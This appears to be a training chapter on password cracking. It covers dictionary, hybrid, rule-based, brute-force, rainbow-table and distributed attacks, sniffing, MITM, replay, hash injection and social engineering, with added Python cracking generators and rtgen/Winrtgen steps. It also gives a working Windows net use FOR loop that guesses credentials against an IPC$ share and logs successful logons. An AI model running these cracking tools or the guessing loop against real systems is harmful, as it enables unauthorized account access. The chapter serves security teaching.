The dictionary attack targets authentication mechanisms, and it succeeds because so many users choose passwords that are dictionary words.

Two ways to improve a dictionary attack:

- Use more than one dictionary: technical dictionaries, foreign-language dictionaries and lists of leaked passwords catch passwords that a single English word list misses.
- Apply string manipulation to the dictionary: for every word also try its variants, for example the reversed word ("system" tried as "metsys"), the word with its case changed, and so on.

BRUTE FORCING ATTACKS

A brute-force attack can be mounted against any cryptographic algorithm, because it makes no assumption about the algorithm beyond being able to test a key. As RSA Laboratories define it: "Exhaustive key search, or brute-force search, is the basic technique of trying every possible key in turn until the correct key is identified." When the attacker holds a ciphertext (or a hash) and the search reaches the right key, the plaintext (or the matching password) is recovered; the only defence is a keyspace too large for the search to finish.

It has long been accepted that the 56-bit key of DES (the Data Encryption Standard, published in 1977) is small enough to be exhausted by a brute-force attack; the question has only ever been how much computing power the attacker can bring to bear. The time a brute-force attack takes is determined by the size of the keyspace, the number of possible keys, which grows exponentially with the key length, and by how fast each trial can be tested. Every cipher except the one-time pad can in principle be broken by brute force; what protects a cipher in practice is that its keyspace is too big to search.

When the attacker knows part of the plaintext, or at least its format, each trial can be checked automatically and the whole attack can be automated. Password hashes are the extreme case: the stored hash is the "known plaintext" against which every guess is compared.

Some considerations for brute-forcing password hashes:

- NT hashes are far stronger than LM hashes: they are case-sensitive, not split into halves and not limited to 14 characters, so their keyspace is enormously larger.
- The order of the search matters: short candidates and the most likely character sets should be tried first.
HYBRID ATTACK

A hybrid attack builds on the dictionary attack. It takes each dictionary word and appends (or prepends) numbers and symbols, because that is how many users turn a plain word into a "complex" password. For example, when the dictionary contains "system", the hybrid attack also tries "system1", "system2" and so on.

SYLLABLE ATTACK

A syllable attack combines brute force with the dictionary. It is used when the password is not an existing word: the attacker takes syllables from dictionary words and combines them into pronounceable candidates, far fewer than all possible strings but still covering the passwords people make up by joining word fragments.

RULE-BASED ATTACK

A rule-based attack is used when the attacker already knows something about the password: its length, the kinds of characters it contains, that it begins with a capital letter, that it ends in two digits, and so on. Those facts become rules that restrict the search, and candidates are generated only within the rules. This is the most powerful form of attack, since it can combine brute force, dictionary and syllable methods with the rules and discard everything the rules exclude.
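The candidate generators behind the dictionary, hybrid, rule-based and brute-force attacks described above, as an added example that is not part of the book. Each generator yields guesses in order; crack() hashes them and counts the trials until one matches. SHA-256 stands in for the stored hash only so that the block is self-contained (real targets are LM, NT or crypt hashes), the three-word dictionary is constructed, and keyspace_size shows why the two halves of an LM hash (7 upper-case characters each) are so much cheaper than a 14-character mixed-case search.

```python
"""Candidate generation for dictionary, hybrid, rule-based and brute-force
attacks, checked against a hash (added example)."""
import hashlib
import itertools
from typing import Iterable, Iterator, Optional, Tuple

LEET = str.maketrans("aeiost", "43105+")


def target_hash(password: str) -> str:
    """Stand-in for the stored hash (SHA-256 keeps the example self-contained)."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def dictionary_candidates(words: Iterable[str]) -> Iterator[str]:
    yield from words


def hybrid_candidates(words: Iterable[str], suffixes=("1", "2", "123", "!")) -> Iterator[str]:
    """Dictionary words with numbers/symbols appended or prepended."""
    for w in words:
        yield w
        for s in suffixes:
            yield w + s
            yield s + w


def rule_candidates(words: Iterable[str]) -> Iterator[str]:
    """String manipulation of each word: case rules, reversal, leetspeak."""
    for w in words:
        yield w
        yield w.upper()
        yield w.capitalize()
        yield w[::-1]            # "system" -> "metsys"
        yield w.translate(LEET)


def brute_force_candidates(charset: str, max_len: int) -> Iterator[str]:
    """Every string over charset up to max_len, shortest first."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def keyspace_size(charset_size: int, max_len: int) -> int:
    """Number of candidates a full brute-force search has to cover."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


def crack(stored: str, candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Return (password, number of trials) or (None, trials) if exhausted."""
    trials = 0
    for cand in candidates:
        trials += 1
        if target_hash(cand) == stored:
            return cand, trials
    return None, trials


WORDS = ["admin", "system", "password"]  # constructed mini dictionary

if __name__ == "__main__":
    print(crack(target_hash("system2"), dictionary_candidates(WORDS)))  # (None, 3)
    print(crack(target_hash("system2"), hybrid_candidates(WORDS)))      # found
    print(crack(target_hash("metsys"), rule_candidates(WORDS)))         # found
    print(crack(target_hash("ab"), brute_force_candidates("abc", 2)))   # ('ab', 5)
    # one LM half (7 upper-case letters) versus 14 mixed-case letters
    print(keyspace_size(26, 7), keyspace_size(52, 14))
```

Real crackers chain these generators (dictionary first, then rules and hybrids, brute force last) and apply them to every hash in a dump at once, since an unsalted hash costs the same to test against one account as against a thousand.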

TYPES OF PASSWORD ATTACKS

Password cracking is one of the most important stages of system hacking, since passwords are the keys to the system. Password attacks are generally divided into four types:

1. Passive Online Attacks

A passive online attack does not interact with the target system or its users; the attacker only listens. Password-related information is captured from the network or from the authentication exchange while it is in transit, and nothing is done that the victim could notice. Examples:

- Wire sniffing
- Man-in-the-middle
- Replay

2. Active Online Attacks

An active online attack is the most direct way of going after a password: the attacker interacts with the target system or its users, for example by trying passwords against the logon service. Such attacks are noisy and are limited by account lockouts and logging. Examples:

- Password guessing
- Trojan/spyware/keylogger
- Hash injection
- Phishing

3. Offline Attacks

An offline attack takes place when the attacker has obtained a copy of the password hashes (the password database, the SAM file, /etc/shadow, or a captured challenge/response) and attacks it on a machine under his own control. Once the file is gone the target can do nothing to slow the attack down; the cracker can try as many candidates as his hardware allows, and the only limits are the strength of the hash and the size of the keyspace. Offline attacks are most often run against LM hashes, whose keyspace is small, and may use pre-computed tables, which trade a large amount of storage for a much faster attack. Defences against offline attacks:

- Use good passwords.
- Remove LM hashes.
- Assume the attacker has the password database.
- Use cryptographically secure methods (salted, slow hashes) for representing the passwords.

Offline attacks include:

- Pre-computed hashes
- Distributed network attacks
- Rainbow table attacks

4. Non-electronic Attacks

Non-electronic attacks are non-technical attacks that need no knowledge of the system at all; they work on the people who hold the passwords:

- Shoulder surfing
- Social engineering
- Dumpster diving

Passive Online Attack: Wire Sniffing

When a packet sniffer tool is used, the attacker has to keep in mind that a sniffer only captures traffic inside the collision domain it is connected to. Traffic in collision domains separated from the attacker by a switch or a bridge never reaches the sniffer, so sniffing a switched or bridged network needs other techniques.

Collision domain:

On a hub, or on a LAN segment that is a single shared wire, every station shares the medium, so frames from different stations can collide. A switch or a bridge divides a network into several collision domains, while a router divides both collision domains and broadcast domains. Ethernet stations manage the shared medium with Carrier Sense Multiple Access With Collision Detection (CSMA/CD): a station listens before it sends and backs off when it detects a collision.

Broadcast domain:

The set of stations that receive a broadcast frame. In a LAN connected by hubs and switches every station is in the same broadcast domain; a router does not forward broadcasts and so forms its border.

In summary:

- Router: separates broadcast domains and collision domains.
- Switch: every port is its own collision domain, but all ports belong to one broadcast domain.
- Hub: all ports belong to one collision domain.

A packet sniffer tool operates at the Data Link Layer: it records the raw frames on the LAN the sniffer is attached to. This is a passive technique; the attacker only copies packets and generates no traffic of his own, which is why it is so hard to detect. On a hub network the medium is a broadcast medium, so every station receives every frame and a passive sniffer sees all the traffic on the LAN. On a switched LAN, frames are delivered only to the port of the destination host, so a passive sniffer captures only broadcasts and the traffic addressed to its own host, and the attacker needs other methods to reach the rest. The captured data often includes passwords sent in clear text by protocols such as Telnet and FTP. Many tools support passive wire sniffing.





[Slide: Wire sniffing. Figure: Victim, Attacker and Victim on the same LAN]

- Attackers run packet sniffer tools on the local area network (LAN) to access and record the raw network traffic
- The captured data may include sensitive information such as passwords (Telnet, FTP, rlogin sessions, etc.) and emails
- Sniffed credentials are used to gain unauthorized access to the target system

Passive Online Attack: Man-in-the-Middle and Replay Attack

In a man-in-the-middle attack the attacker places himself between two parties that are communicating, in a position where he can intercept the traffic flowing in both directions. He can then sniff (and possibly alter) the connection on both sides without either party noticing. The attack is effective against protocols such as telnet and against wireless networks that carry their authentication in the clear, and it is harder to carry out than plain sniffing, because the attacker has to be accepted as the other end by one or both sides of the conversation.

In a replay attack the attacker captures packets and authentication tokens with a sniffer tool. After extracting the relevant information he places the packets back on the network later to re-use the authentication, for example to repeat a bank transaction or to authenticate to the server as the victim.
[Slide: MITM / Replay. Figure: Victim <-> Attacker (sniff, MITM / replay traffic) <-> Web Server, with the original connection shown between Victim and Web Server; caption: "Gain access to the communication channels"]

- In a MITM attack, the attacker acquires access to the communication channels between victim and server to extract the information
- In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant info is extracted, the tokens are placed back on the network to gain access

Considerations:

- Relatively hard to perpetrate
- Must be trusted by one or both sides
- Can sometimes be broken by invalidating traffic

Active Online Attack: Password Guessing

Password guessing is the most direct active attack: the attacker tries to log on to the target system with user names and candidate passwords taken from a dictionary. The attacker takes a set of dictionary words and names and tries all the possible combinations, with variations such as words spelled backwards, different capitalization, and numbers or symbols added to the words.

Attackers build their dictionaries from common passwords, names of people and places, dates and words related to the target, because users tend to choose passwords they can remember easily. The weakness of the method is that every guess is sent to the target, so it takes a long time, consumes a lot of network bandwidth and is easily detected and logged, and an account lockout policy stops it after a few attempts.



[Slide: Password guessing. Figure: Attacker -> Network -> target system]

- The attacker takes a set of dictionary words and names, and tries all the possible combinations to crack the password

Considerations:

- Time consuming
- Requires huge amounts of network bandwidth
- Easily detected
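As an added illustration of the hybrid, syllable and rule-based attacks described earlier and of the candidate lists a password-guessing tool works from, the following Python code (written for this page, not taken from any tool the page describes) generates the candidate sets from a small constructed word list. The suffix list and the syllabification are assumptions made for the example; the syllable step is a deliberately simple approximation, and real crackers ship far larger rule sets.

```python
import itertools

# Constructed word list standing in for a dictionary file (example data only).
WORDS = ["system", "admin", "password", "letmein"]


def dictionary(words):
    """Dictionary attack: try each word exactly as it appears in the list."""
    for w in words:
        yield w


def hybrid(words, suffixes=None):
    """Hybrid attack: dictionary words with digits/symbols appended or prepended.

    "system" becomes "system1", "system2", ... "1system", "system!" and so on.
    The suffix list is an assumption for the example.
    """
    if suffixes is None:
        suffixes = [str(n) for n in range(10)] + ["!", "123", "2013"]
    for w in words:
        yield w
        for s in suffixes:
            yield w + s
            yield s + w


def syllable(words, piece_len=3):
    """Syllable attack (toy approximation): join fragments of dictionary words.

    A fragment is the first or last `piece_len` letters of a word; every ordered
    pair of fragments is tried, so "sys" + "adm" gives "sysadm".
    """
    pieces = []
    for w in words:
        pieces.append(w[:piece_len])
        pieces.append(w[-piece_len:])
    seen = set()
    for a, b in itertools.permutations(pieces, 2):
        cand = a + b
        if cand not in seen:
            seen.add(cand)
            yield cand


def mangle(word):
    """A few mangling rules of the kind rule-based crackers apply."""
    yield word
    yield word.capitalize()
    yield word.upper()
    yield word[::-1]
    yield word.replace("a", "@").replace("s", "$").replace("o", "0")


def rule_based(words, min_len=0, max_len=64, need_digit=False, need_upper=False):
    """Rule-based attack: mangle the hybrid candidates, then keep only those that
    satisfy what the attacker already knows about the password (length range,
    presence of a digit, presence of an upper-case letter)."""
    seen = set()
    for base in hybrid(words):
        for cand in mangle(base):
            if cand in seen:
                continue
            seen.add(cand)
            if not (min_len <= len(cand) <= max_len):
                continue
            if need_digit and not any(ch.isdigit() for ch in cand):
                continue
            if need_upper and not any(ch.isupper() for ch in cand):
                continue
            yield cand


def count(candidates):
    """Size of a candidate set, i.e. the number of logon attempts it costs online."""
    return sum(1 for _ in candidates)
```

Comparing count(dictionary(WORDS)), count(hybrid(WORDS)) and count(rule_based(WORDS, min_len=8, need_digit=True, need_upper=True)) shows the point of the rule-based approach: knowledge of the password policy discards most of the hybrid candidates before a single logon attempt is made.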



Active Online Attack: Trojan/Spyware/Keylogger

A Trojan horse is a destructive program disguised as a useful or harmless application. Unlike a virus it does not replicate itself, but it can be just as damaging. It usually arrives inside a program the user wants to run, and once it has been executed it opens a backdoor that gives the attacker remote access to the system, so he can steal information or plant further tools such as spyware or a keylogger. Trojans are hard to remove because they hide their files and may re-install themselves.

Spyware is software installed on a computer without the user's knowledge, usually bundled with other downloads or delivered by a malicious web site. It collects information and sends it to the attacker over the Internet: the sites the user visits, his e-mail addresses and, above all, user names, passwords and credit card numbers. Spyware can also change the computer's settings, for example the browser home page or the dial-up connection, and it slows the machine down and interferes with the Internet connection. It is often hard to detect and remove.

A keylogger is a program, or a small hardware device, that records every key the user presses without the user's knowledge, and stores the log or sends it to the attacker. Because everything typed is captured, the user names and passwords entered at any logon screen end up with the attacker, together with e-mail, chat and anything else typed on the keyboard. Keyloggers are also sold as legitimate monitoring software, and both hardware and software versions exist; a hardware keylogger plugged in between the keyboard and the computer cannot be seen by any software on the machine.

With a keylogger the attacker therefore obtains the victim's passwords directly, without having to crack anything (see Stealing Passwords Using Keylogger below).

Active Online Attack: Hash Injection Attack

A hash injection attack lets the attacker inject a compromised hash into a local session and use it to authenticate to network resources, without ever knowing the plaintext password. The attack proceeds in four steps:

1- The hacker compromises one workstation/server using a local/remote exploit.

2- The hacker extracts the logged-on hashes from the compromised machine and finds a logged-on domain admin account hash.

3- The hacker uses that hash to log on to the domain controller.

4- The hacker extracts all the hashes in the Active Directory database and can now impersonate any account in the domain.

[Figure: Attacker -> Victim Computer: "Inject a compromised hash into a local session"]

Offline Attack: Rainbow Attacks

An offline attack is one in which the attacker obtains a copy of the password hashes and cracks them on a machine he controls, so he can try candidates at full speed without interacting with the target and without the risk of lockout or detection. Offline attacks are usually time-consuming, but they work well against weak hash types such as LM, whose keyspace is small. The two offline techniques covered here are:

- Rainbow Attacks
- Distributed network Attacks

Rainbow Attacks

A rainbow attack is based on a cryptanalytic time-memory trade-off: instead of computing every hash at cracking time, the attacker spends time in advance computing the hashes of a large set of candidate passwords and stores them in a compact structure called a "rainbow table". The lookup at cracking time is then fast.

Rainbow Table

A rainbow table is a lookup table used to recover a password from its hash (the cipher text). The attacker compares the captured hash with the entries in the table; a match gives the plaintext password.

Computed Hashes

The attacker computes the hashes of a list of candidate passwords and stores them in the rainbow table.

Compare the Hashes

The captured hash of the target password is compared against the pre-computed tables; a match reveals the password.

Pre-Computed Hashes

Pre-computed hashes are the hash values of the candidate passwords, generated in advance. Comparing hashes is much faster than a dictionary attack because the expensive hashing is done once beforehand; if the password is covered by the table, cracking takes seconds. Computing the hashes for a large keyspace takes a very long time and a list of every hash would need enormous storage, which is why a time-space tradeoff technique is used: the table stores only the start and end points of long chains of hashes, so it needs a small fraction of the memory of a full list at the cost of some extra computation during lookup.



Examples of plaintext -> hash pairs as printed in the original figure (the values are illustrative):

lqazwed   -> 4259cc34599c530b28a6a8f225d668590
hh021da   -> c744b1716cbf8d4dd0ff4ce31a177151
9da8dasf  -> 3cd696a8571a843cda453a229d741843
sodifo8sf -> 7ad7d6fa6bb4fd28ab98b3dd33261e8f
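A worked version of the time-memory trade-off, added here as an illustration and not code from Winrtgen, rtgen or any other tool on this page. It builds a tiny rainbow table for three-letter lower-case passwords hashed with MD5 (the hash, chain length, chain count, start-point spacing and reduction function are all chosen for the example) and looks a hash up by walking the chains. keyspace_size and table_bytes reproduce the key space and disk space figures Winrtgen shows in its table properties dialog.

```python
import hashlib

CHARSET = "abcdefghijklmnopqrstuvwxyz"
PLAIN_LEN = 3                        # fixed-length toy keyspace: 26**3 = 17576
KEYSPACE = len(CHARSET) ** PLAIN_LEN
CHAIN_LEN = 50                       # hash/reduce steps per chain
CHAIN_COUNT = 400                    # chains per table


def keyspace_size(charset, min_len, max_len):
    """Number of candidates for all lengths in [min_len, max_len]."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def table_bytes(chain_count, entry_bytes=16):
    """A chain is stored as start point + end point (8 bytes each here)."""
    return chain_count * entry_bytes


def index_to_plaintext(idx):
    """Map an integer in [0, KEYSPACE) to a candidate password (mixed radix)."""
    out = []
    for _ in range(PLAIN_LEN):
        idx, r = divmod(idx, len(CHARSET))
        out.append(CHARSET[r])
    return "".join(out)


def H(plaintext):
    return hashlib.md5(plaintext.encode()).digest()


def R(digest, step):
    """Reduction function: map a digest back into the keyspace. Mixing in the
    column number makes each column's reduction different, which is what
    distinguishes a rainbow table from Hellman's original tables."""
    return index_to_plaintext((int.from_bytes(digest[:8], "little") + step) % KEYSPACE)


def build_table(chain_count=CHAIN_COUNT, chain_len=CHAIN_LEN):
    """Precomputation: walk each chain and store only endpoint -> start points."""
    table = {}
    for n in range(chain_count):
        start = index_to_plaintext((n * 7919) % KEYSPACE)   # deterministic spread
        p = start
        for step in range(chain_len):
            p = R(H(p), step)
        table.setdefault(p, []).append(start)   # keep all starts on a merged endpoint
    return table


def lookup(table, target, chain_len=CHAIN_LEN):
    """Cracking: assume the target hash sits in column pos, finish the chain from
    there, and if the endpoint is known regenerate that chain from its start."""
    for pos in range(chain_len - 1, -1, -1):
        p = R(target, pos)
        for step in range(pos + 1, chain_len):
            p = R(H(p), step)
        for start in table.get(p, ()):
            q = start
            for step in range(chain_len):
                if H(q) == target:
                    return q
                q = R(H(q), step)          # false alarm: endpoint merged, keep going
    return None
```

The table holds CHAIN_COUNT entries but covers up to CHAIN_COUNT * CHAIN_LEN candidates, which is the memory saving; the price is that a lookup costs up to CHAIN_LEN * CHAIN_LEN / 2 reductions and hashes, and merged chains (two chains reaching the same endpoint) reduce coverage, which is why Winrtgen reports a success probability below 100% even for a table whose chains nominally exceed the keyspace.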



Tools to Create Rainbow Tables: Winrtgen and Rtgen

Several tools generate Rainbow Tables; two common ones are Winrtgen and rtgen.

Winrtgen

Source: http://www.oxid.it/projects.html

Winrtgen is a graphical Rainbow Tables generator from oxid.it (the Cain & Abel project). It can build tables for the following hash types:

LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384) and SHA-2 (512) hashes

1- Run Winrtgen.exe; the main window opens, as follows:



[Screenshot: Winrtgen v2.3 (Rainbow Tables Generator) by mao; empty table list with columns Filename / Status and the buttons Add Table, Remove, Remove All, About, OK, Exit]



2- Click Add Table; the Rainbow Table properties dialog opens:

[Screenshot: Rainbow Table properties dialog with the fields Hash, Min Len, Max Len, Index, Chain Len, Chain Count, N° of tables and Charset (default alpha: ABCDEFGHIJKLMNOPQRSTUVWXYZ); Table properties: Key space: 8353082582 keys, Disk space: 610.35 MB, Success probability: 0.378033 (37.80%); Benchmark: Hash speed, Step speed, Table precomputation time, Total precomputation time, Max cryptanalysis time; Optional parameter: Administrator; buttons Benchmark, OK, Cancel]

The Table properties box is recalculated as the parameters change: the key space is the number of candidates the charset and length range can produce, the disk space follows from the chain count (each chain is stored as a start and an end point), and the success probability is the fraction of that key space the table is expected to cover.
3- In the Hash field choose the hash type the table will be built for; in this example ntlm is selected, with Min Len 4 and Max Len 9 (the range of password lengths to cover), Chain Len 2400 and Chain Count 4000000.

4- In the Charset field choose the character set; loweralpha (abcdefghijklmnopqrstuvwxyz) is selected here, which covers passwords made only of lower-case letters.

[Screenshot: Rainbow Table properties with Hash: ntlm, Min Len 4, Max Len 9, Index 0, Chain Len 2400, Chain Count 4000000, Charset loweralpha (abcdefghijklmnopqrstuvwxyz); Table properties: Key space: 5646683807856 keys, Disk space: 61.03 MB, Success probability: 0.001687 (0.17%)]

Note the success probability of 0.17%: a single table of 4000000 chains of length 2400 covers only a tiny part of a key space of 5.6 trillion lower-case passwords of length 4 to 9. To get useful coverage the chain count, chain length or number of tables has to be raised (the Benchmark button estimates how long that precomputation will take), or the length range has to be narrowed.

5- Click OK to add the table to the list.



[Screenshot: Winrtgen main window listing the queued table ntlm_loweralpha#4-9_0_2400x4000000_oxid#000.rt in the Filename / Status list]

6- Click OK to start generating the table file.

7- Generating the table takes some time, depending on the hash type and the charset chosen.

Rtgen

Source: http://www.project-rainbowcrack.com

RainbowCrack is a general-purpose implementation of the time-memory trade-off technique that supports a very large keyspace. Its rtgen tool generates rainbow tables from the command line; the table parameters are passed as arguments in the following order:

rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

[Screenshot: Administrator: Command Prompt - rtgen ntlm loweralpha 1 7 0 1000 4000000 0]

The command in the screenshot builds table 0, part 0, for ntlm hashes of lower-case passwords of length 1 to 7, with 4000000 chains of 1000 steps each.

Offline Attack: Distributed Network Attacks

A Distributed Network Attack (DNA) is a technique for recovering password-protected files by using the unused processing power of the machines on a network to decrypt passwords. The DNA manager is installed in a central location and coordinates the work: it splits the key search into small pieces and distributes them over the network to the DNA clients installed on the participating machines, each of which searches its part of the keyspace and reports back. It has been used, for example, to recover the passwords of Office 97 and Office 2000 files.

Features of DNA:

- Reads statistics and graphs easily.
- Adds user dictionaries to crack the password.
- Optimizes password attacks for specific languages.
- Modifies the user dictionaries.
- Stealth client installation.
- Automatic client update when the DNA server is updated.
- Controls the clients and how much of their processing time the search may use.

The DNA program has two modules:

DNA Server Interface -1

The DNA Server Interface is the interface the user works with to manage DNA jobs. It runs on the machine where the DNA Server Module is installed and is divided into the following sections:

Current jobs: the list of jobs added by the controller that are currently running. Each entry shows the job ID assigned by the DNA server, the file name, the start time and the progress of the search.

Finished jobs: the list of jobs that have completed, with the decrypted password where the search succeeded. Each entry shows the job ID, the file name, the password, the time the job was added to the DNA queue, the time DNA started working on it and the time it finished.

DNA Client Interface -2

The DNA Client Interface runs on each workstation that takes part in the search; it shows the client's status and the job DNA is currently working on (the current job). The Network Traffic dialog box shows the traffic between the client and the server. The work unit length is the amount of keyspace the DNA client processes before it reports its result to the server and asks for the next unit; the DNA server uses it to decide how much work to hand out at a time. A unit that is too long means that a client which drops off the network wastes more work, while a unit that is too short increases the network traffic between client and server.
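The way a DNA manager carves the keyspace into work units and hands them to clients, as an added example written for this page (not AccessData's DNA or Elcomsoft's code): every candidate password is numbered, a work unit is a range of those numbers, and threads stand in for the client machines. The MD5 target, the charset and the unit length are assumptions made for the example; a real deployment hashes with the file format's algorithm and ships units to clients over the network.

```python
import hashlib
from concurrent.futures import ThreadPoolExecutor, as_completed

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"   # assumed search charset


def index_to_candidate(idx, length, charset=CHARSET):
    """Map a keyspace index to the candidate password it numbers (mixed radix)."""
    out = []
    for _ in range(length):
        idx, r = divmod(idx, len(charset))
        out.append(charset[r])
    return "".join(out)


def work_units(keyspace, unit_len):
    """Split [0, keyspace) into consecutive units of at most unit_len indexes.
    unit_len is the 'work unit length' a DNA client processes per request."""
    return [(start, min(start + unit_len, keyspace))
            for start in range(0, keyspace, unit_len)]


def search_unit(target_digest, length, unit):
    """What one DNA client does: hash every candidate in its unit and report
    the hit, or None when the unit is exhausted."""
    lo, hi = unit
    for idx in range(lo, hi):
        cand = index_to_candidate(idx, length)
        if hashlib.md5(cand.encode()).digest() == target_digest:
            return cand
    return None


def distributed_search(target_hex, length, unit_len, workers=4):
    """What the DNA manager does: hand units to workers, collect results and
    stop handing out work as soon as one client reports a hit."""
    target = bytes.fromhex(target_hex)
    keyspace = len(CHARSET) ** length
    units = work_units(keyspace, unit_len)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = {pool.submit(search_unit, target, length, u): u for u in units}
        for fut in as_completed(futures):
            hit = fut.result()
            if hit is not None:
                for other in futures:
                    other.cancel()          # units not yet started are dropped
                return hit
    return None
```

Threads are used only so the example runs stand-alone; Python threads do not speed up the hashing itself, and the point is the partitioning: a client that disappears loses at most one unit of work, and the manager can re-issue that range to another client.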

Elcomsoft Distributed Password Recovery

Source: http://www.elcomsoft.com

Elcomsoft Distributed Password Recovery recovers complex passwords and strong encryption keys by distributing the work over many computers and workstations. It accelerates recovery by using the processing power of the graphics cards (GPU) in those machines: brute-force attacks on compatible NVIDIA and ATI cards run much faster than on the CPU alone.

Note: this is one of the tools for Distributed Network Attacks and, in addition to the CPU of each machine, it also uses the GPU.

Features:

1- GPU acceleration of password recovery.
2- Distributed password recovery over a LAN, the Internet, or both.
3- Console management from any networked PC.
4- Plug-in architecture that allows support for additional file formats to be added.
[Screenshot: Elcomsoft Distributed Password Recovery console, showing the connected agents, the job queue with the objects being recovered, the attack settings (character set ABCDEFGHIJKLMNOPQRSTUVWXYZ and password length), and the Start / Apply controls]

Non-Electronic Attacks

Non-electronic attacks are also called non-technical attacks because they need no knowledge of the system's technology. They include dumpster diving, keyboard sniffing, shoulder surfing and social engineering.

Dumpster Diving: the attacker searches an organization's trash for information such as passwords written on paper, access codes, organization charts and internal phone lists that help further attacks. It is a low-tech attack that can yield a great deal of information; the term has been in use since the 1980s. The information gathered is used to gain unauthorized access to systems, to support other attacks such as social engineering, or for identity theft.

Shoulder Surfing: the attacker watches the user directly, standing behind or beside him as he types, to see the password or PIN being entered. It works best in crowded places, for example at an ATM when the victim enters his PIN, and it can also be done from a distance with binoculars or a camera. Unlike the technical attacks, shoulder surfing gives the attacker the password itself, not a hash that still has to be cracked.

Eavesdropping: listening in on conversations, for example phone calls in which a password or account details are read out, is another way of obtaining a password without touching the system.

Password sniffing: on a network that uses broadcast technology (such as a hub) every station receives every message sent on the wire, although normally a machine ignores messages not addressed to it. An attacker's machine can be set to read all messages on the network and thus capture the passwords that users send in clear text when they log on to other systems. With this password sniffing technique attackers can collect thousands of passwords from a single network.

Social Engineering: in information security, social engineering is the art of manipulating people into giving up confidential information or performing an action that helps the attacker. It relies on people's natural trust and willingness to help rather than on a technical weakness. For example, the attacker calls the help desk pretending to be the system administrator, or an employee who has forgotten his password, and persuades the person at the other end to reveal or reset a password. Social engineers build believable pretexts and false identities, and people are the weakest link in most security systems, so this attack often succeeds where technical attacks fail. The defense is awareness training, verification procedures and clear policies about what may be given out over the phone or by e-mail.

Keyboard Sniffing: the attacker records the victim's keystrokes with a keylogger (see Stealing Passwords Using Keylogger below).

Default Passwords

Source: http://securityoverride.org/default-password-list

A default password is the password set by the manufacturer on a new device, or the password that ships with a software installation. Default passwords are documented publicly, so an attacker who can identify the make and model of a device looks up its default credentials and logs in if the administrator never changed them. Changing the default password and disabling unneeded default accounts should therefore be the first step after installing any device. The following sites maintain lists of default passwords:

http://cirt.net 

http://default-password.info 

http://www.defaultpassword.us 

http://www.passwordsdatabase.com 

https://w3dt.net 

http://www.virus.org 

http://open-sez.me 

http://securityoverride.org 

http://www.routerpasswords.com 
Manual Password Cracking (Guessing)

Manual password cracking (guessing) is the attacker logging on to the target system by hand with guessed user names and passwords: blank passwords, the user name itself, "password" and other obvious values. It is slow and tedious, and against a system with an account lockout policy it is rarely worth the effort, so attackers usually automate the guessing. A simple FOR loop in the Windows command shell turns manual guessing into an automated attack: the attacker creates a text file with the user names and passwords to try, loops over the file issuing a net use command for each pair, and records the successful logons in an output file. The credentials file and the loop look like this:

[file: credentials.txt]
administrator ""
administrator password
administrator administrator
[Etc.]

From a directory that can access the text file, the command is typed as follows:

C:\>FOR /F "tokens=1,2*" %i in (credentials.txt) ^
More? do net use \\victim.com\IPC$ %j /u:victim.com\%i ^
More? 2>>nul ^
More? && echo %time% %date% >> outfile.txt ^
More? && echo \\victim.com acct: %i pass: %j >> outfile.txt

C:\>type outfile.txt

The file credentials.txt holds one user name and one password per line. FOR /F parses each line into %i (the user name) and %j (the password); net use attempts a logon to the IPC$ share with that pair, error output is discarded, and the && operators run the two echo commands only when net use succeeded, so outfile.txt ends up with the time, date, account and password of every successful logon.
Automatic Password Cracking

Password cracking is essentially the trial-and-error method of guessing automated by tools. Instead of logging on to the target for each attempt, the attacker works on the hashed passwords: a password hash is a fixed-length value produced from the password by a one-way hash function, and the system stores only this value, since the original password cannot be recovered from the hash directly. Cracking therefore means generating candidate passwords, hashing each one with the same algorithm the system uses, and comparing the result with the stored hash; a match reveals the password. The same scheme works against the hashed passwords of any system, for example NT, Unix and Netware, although the hash algorithms differ.

A cracker program may work through a dictionary attack (trying each word of a word list) or, as a last resort, through exhaustive brute force. The automated procedure is:

1- Find a valid user account (the user ID).
2- Obtain the encrypted (hashed) passwords, for example by dumping the system's password database.
3- Find the algorithm used for encryption.
4- Create a list of the possible passwords.
5- Encrypt (hash) each word in the list.
6- Verify whether there is a match for each user ID, and repeat until a match is found or the list is exhausted.

Note: an attacker who has captured password hashes does not always need to crack them. In the "Pass the hash" attack the hash itself is presented to the authentication protocol in place of the password, so the attacker authenticates as the user in a few steps without ever knowing the plaintext. This is why stored hashes have to be protected as carefully as the passwords themselves.
[Figure: automated password cracking flowchart: Find a valid user -> Obtain the encrypted passwords -> Find the algorithm used for encryption -> Create a list of the possible passwords -> Encrypt each word -> Verify whether there is a match for each user ID]

Performing Automated Password Guessing

If manual guessing fails, the attacker moves to an automated attack. Several tools do this, for example Legion and the NetBIOS Auditing Tool (NAT), which guess passwords for Windows shares over NetBIOS, and John the Ripper, which works offline on captured hashes. The simplest method on NT/2000 is the FOR loop built on the net use command shown above: the attacker prepares a file with user name and password pairs and loops over them:

C:\> FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %j /u:%i

In each line of credentials.txt the user name comes first and the password second, so %i is the user and %j the password; net use takes the password before the /u: switch.

Automated password attacks follow one of the following approaches:

1- A simple dictionary attack, which loads a dictionary file (a text file with a list of words) into a cracking program such as John the Ripper or L0phtCrack, which runs it against the user accounts found on the system. Dictionary attacks are the fastest, but they only find passwords that appear in the list.

2- The brute force method, the most time-consuming, tries every combination of characters until the password is found (automated exploration of the whole keyspace).

3- A hybrid approach, which starts from a dictionary word and extends it with numbers and symbols, for example by adding digits at the end of the word.

Stealing Passwords Using USB Drives

